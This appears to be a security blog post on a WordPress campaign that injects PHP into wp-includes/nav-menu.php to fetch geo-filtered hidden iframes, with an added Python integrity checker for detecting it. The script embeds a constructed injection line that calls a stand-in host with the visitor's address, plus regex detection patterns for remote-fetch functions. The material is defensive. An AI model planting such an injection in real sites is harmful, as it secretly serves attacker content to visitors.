Last March we described a WordPress attack that was responsible for hidden iframe injections that resembled Darkleech injections: declarations of styles with random names and coordinates, iframes with No-IP host names, and random dimensions where the random parts changed on every page load.
Back then, we identified that it was not a server-level infection. The malicious PHP code was injected into the wp-includes/nav-menu.php file. It fetched the actual iframe code on the fly from a remote server.
Since then, we’ve been regularly cleaning sites infected with this malware. While the PHP code in the wp-includes/nav-menu.php file hasn’t changed much, the visitor-facing part of the attack has changed significantly.
First of all, the attack became stealthier. The injected code checks where a request comes from and does not reveal the iframe to requests from networks (including whole countries) that the attackers are not interested in, so a visit or scan from such a network sees a clean page even though the server is still infected.
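Because the visitor-facing payload can be hidden from whole networks, a remote scan is not a reliable way to confirm a clean-up; the server-side indicator described above, a modified wp-includes/nav-menu.php that fetches content from a remote host at request time, is. The following is an added example written for this post, not Sucuri's tooling and not the campaign's code. It compares a WordPress tree against a trusted baseline of SHA-256 hashes and, for any file that differs, reports simple indicators of a remote fetch keyed on the requester's address. The file contents it builds are constructed stand-ins (a tiny fake nav-menu.php and a hypothetical injection pointing at example.invalid), not real WordPress source or real malware.

```python
"""Offline integrity and indicator check for a WordPress tree (added example)."""
import hashlib
import pathlib
import re
import tempfile

# Constructed stand-in for a pristine core file; not the real nav-menu.php.
CLEAN_NAV_MENU = (
    "<?php\n"
    "/** Navigation Menu functions (constructed stand-in) */\n"
    "function wp_get_nav_menu_object( $menu ) {\n"
    "    return $menu;\n"
    "}\n"
)

# Constructed, hypothetical injection: fetches the iframe markup from a remote
# host and passes the visitor's address so the remote side can decide whether
# this network should be served anything at all.
INJECTED_SNIPPET = (
    "<?php echo @file_get_contents('http://example.invalid/get.php?ip='"
    " . $_SERVER['REMOTE_ADDR']); ?>\n"
)

# Triage hints for PHP that pulls and emits remote content at request time.
# They are hints only; the hash mismatch is the authoritative signal.
INDICATORS = {
    "remote_file_get_contents": re.compile(r"file_get_contents\s*\(\s*['\"]https?://"),
    "curl": re.compile(r"\bcurl_(?:init|exec)\s*\("),
    "fsockopen": re.compile(r"\bfsockopen\s*\("),
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "remote_addr_lookup": re.compile(r"\$_SERVER\s*\[\s*['\"]REMOTE_ADDR['\"]\s*\]"),
}


def sha256_file(path: pathlib.Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def build_baseline(root: pathlib.Path) -> dict:
    """Hash every .php file under root, keyed by POSIX-style relative path.
    In practice the baseline comes from a pristine copy of the same WordPress
    release, never from the suspect install itself."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*.php"))}


def scan_indicators(text: str) -> list:
    """Names of the INDICATORS that match the given PHP source."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def check_tree(root: pathlib.Path, baseline: dict) -> dict:
    """Return {relpath: {"status", "indicators"}} for every file that is
    modified, unexpected or missing relative to the baseline."""
    current = build_baseline(root)
    findings = {}
    for rel in sorted(set(baseline) | set(current)):
        if rel not in current:
            findings[rel] = {"status": "missing", "indicators": []}
            continue
        if rel in baseline and current[rel] == baseline[rel]:
            continue
        status = "unexpected" if rel not in baseline else "modified"
        text = (root / rel).read_text(errors="replace")
        findings[rel] = {"status": status, "indicators": scan_indicators(text)}
    return findings


def demo(tamper: bool = True) -> dict:
    """Build a two-file tree, baseline it, optionally prepend the constructed
    injection to wp-includes/nav-menu.php, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = pathlib.Path(tmp)
        inc = root / "wp-includes"
        inc.mkdir()
        (inc / "nav-menu.php").write_text(CLEAN_NAV_MENU)
        (inc / "version.php").write_text("<?php $wp_version = '0.0';\n")
        baseline = build_baseline(root)
        if tamper:
            (inc / "nav-menu.php").write_text(INJECTED_SNIPPET + CLEAN_NAV_MENU)
        return check_tree(root, baseline)


if __name__ == "__main__":
    for rel, info in demo().items():
        print(f"{info['status']:10} {rel}  indicators={info['indicators']}")
```

Run against a real install, point `build_baseline` at a freshly downloaded copy of the same WordPress version and `check_tree` at the suspect document root; anything under wp-includes or wp-admin that shows up as modified is worth a manual look regardless of whether the indicator list is empty, since the fetched markup (and any network filtering) lives on the attackers' server, not in the file.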